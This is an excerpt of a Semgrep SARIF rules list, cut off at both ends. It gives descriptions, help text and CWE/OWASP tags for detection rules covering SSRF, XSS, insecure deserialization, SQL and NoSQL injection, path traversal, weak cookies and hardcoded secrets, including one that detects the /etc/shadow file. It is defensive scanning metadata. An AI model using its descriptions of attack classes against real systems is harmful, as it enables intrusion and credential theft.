generic.unicode.security.bidi.contains-bidirectional-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","id":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","name":"python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.net.tainted-cherrypy-http-request-requests.tainted-cherrypy-http-request-requests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"help":{"markdown":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href)\n - [https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI](https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss#:~:text=javascript:%20URI)\n - [https://github.com/pugjs/pug/issues/2952](https://github.com/pugjs/pug/issues/2952)\n","text":"Detected a template variable used in an anchor tag with the 'href' attribute. This allows a malicious actor to input the 'javascript:' URI and is subject to cross- site scripting (XSS) attacks. If using a relative URL, start with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","id":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","name":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-href.var-in-href"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django","id":"python.django.deserialization.tainted-dill-django.tainted-dill-django","name":"python.django.deserialization.tainted-dill-django.tainted-dill-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-dill-django.tainted-dill-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"help":{"markdown":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role)\n - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)\n","text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"helpUri":"https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role","id":"json.aws.security.wildcard-assume-role.wildcard-assume-role","name":"json.aws.security.wildcard-assume-role.wildcard-assume-role","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.wildcard-assume-role.wildcard-assume-role"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password","id":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","name":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-empty-password.pgx-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors)\n - [https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin](https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors","id":"php.lang.security.php-permissive-cors.php-permissive-cors","name":"php.lang.security.php-permissive-cors.php-permissive-cors","properties":{"precision":"very-high","tags":["CWE-346: Origin Validation Error","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.php-permissive-cors.php-permissive-cors"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"help":{"markdown":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return)\n - [https://pkg.go.dev/sync#Mutex](https://pkg.go.dev/sync#Mutex)\n - [https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/](https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/)\n","text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"helpUri":"https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","id":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","name":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","properties":{"precision":"very-high","tags":["CWE-667: Improper Locking","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.missing-unlock-before-return.missing-unlock-before-return"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `sandbox`."},"help":{"markdown":"Make sure that unverified user data can not reach `sandbox`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Make sure that unverified user data can not reach `sandbox`."},"helpUri":"https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","id":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","name":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://sqlobject.org/SQLBuilder.html](https://sqlobject.org/SQLBuilder.html)\n - [https://sqlobject.org/SQLObject.html](https://sqlobject.org/SQLObject.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask","id":"python.flask.db.sqlobject-flask.sqlobject-flask","name":"python.flask.db.sqlobject-flask.sqlobject-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlobject-flask.sqlobject-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"help":{"markdown":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","id":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","name":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Generic Secret detected"},"help":{"markdown":"Generic Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Generic Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret","id":"generic.secrets.security.detected-generic-secret.detected-generic-secret","name":"generic.secrets.security.detected-generic-secret.detected-generic-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-generic-secret.detected-generic-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","id":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","name":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","id":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","name":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection","id":"javascript.phantom.security.audit.phantom-injection.phantom-injection","name":"javascript.phantom.security.audit.phantom-injection.phantom-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.phantom.security.audit.phantom-injection.phantom-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","id":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","name":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"help":{"markdown":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","id":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","name":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","properties":{"precision":"very-high","tags":["CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal)\n - [https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values](https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"helpUri":"https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","id":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","name":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"linux shadow file detected"},"help":{"markdown":"linux shadow file detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"linux shadow file detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow","id":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","name":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-etc-shadow.detected-etc-shadow"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, 